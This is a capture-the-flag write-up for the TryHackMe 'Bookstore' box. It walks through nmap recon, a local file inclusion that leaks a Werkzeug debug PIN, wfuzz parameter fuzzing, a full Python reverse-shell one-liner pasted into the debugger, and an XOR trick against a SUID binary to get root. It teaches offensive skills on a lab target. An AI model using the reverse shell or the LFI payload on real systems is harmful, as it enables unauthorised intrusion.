CTF-Writeups/TryHackMe/Bookstore.md
2020-11-29 00:11:01 +05:00

3.9 KiB

TryHackMe-Bookstore

NMAP

Nmap scan report for 10.10.117.123
Host is up (0.15s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA)
|   256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA)
|_  256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Book Store
5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 3.6.9)
| http-robots.txt: 1 disallowed entry 
|_/api </p> 
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1323.85 seconds

PORT 80

PORT 5000

As we saw from nmap scan that there is a robots.txt file at port 5000

Running gobuster on this port we see a console a type of debugger

But it's asking for a PIN.

I found a metasploit exploit for it but it didn't worked

Going back to port 80 and then looking at the login page source we find that PIN is in bash history file of user sid.

We know there are two versions of api v1 and v2 , v1 is likely to be vulnerable to LFI so let's choose the endpoint that has a parameter

/api/v2/resources/books?id=1

Change this to

/api/v1/resources/books?id=.bash_history

then put it in wfuzz

Wfuzz

wfuzz -u http://10.10.117.123:5000/api/v1/resources/books\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404

Here

-u the host with the api-endpoint ?FUZZ here ? is before the paramter and "FUZZ" is the location where we want to find the paramter --hc is telling to hide status codes like 404 which is not found

cd /home/sid whoami export WERKZEUG_DEBUG_PIN=123-321-135 echo $WERKZEUG_DEBUG_PIN python3 /home/sid/api.py ls exit 

And now we can interact with the debugger also in order to get into the box we have to paste a reverse shell there

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.209.100",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Paste this on to the debugger and set your netcat listener

Privlege Escalation

We see a binary which has a SUID on it so it can run as a root but we need to figure out what it is doing and how we can execute it properly to get root

On analyzing the binary with ghidra

? ----> local_1c is the number we are going to input 4374 ----> 23987 ---> local_18

local_14 has to be this number 1573724660

I have converted those hexadecimal number to decimal to get a better understanding

local_14 = local_1c ^ 4374 ^ local_18

What's happening in here is that these three values are getting through and exclusive OR operator ^ .We don't know what value we put inorder to get 1573724660.

So I'll convert hex values to decimal and XOR between them

1573724660 ^ 4374 ^ local_18

1573724660 ^ 4374 ^ 23987

1573724660 ^ 19621

1573743953

Let's try the final result we got

And we are root !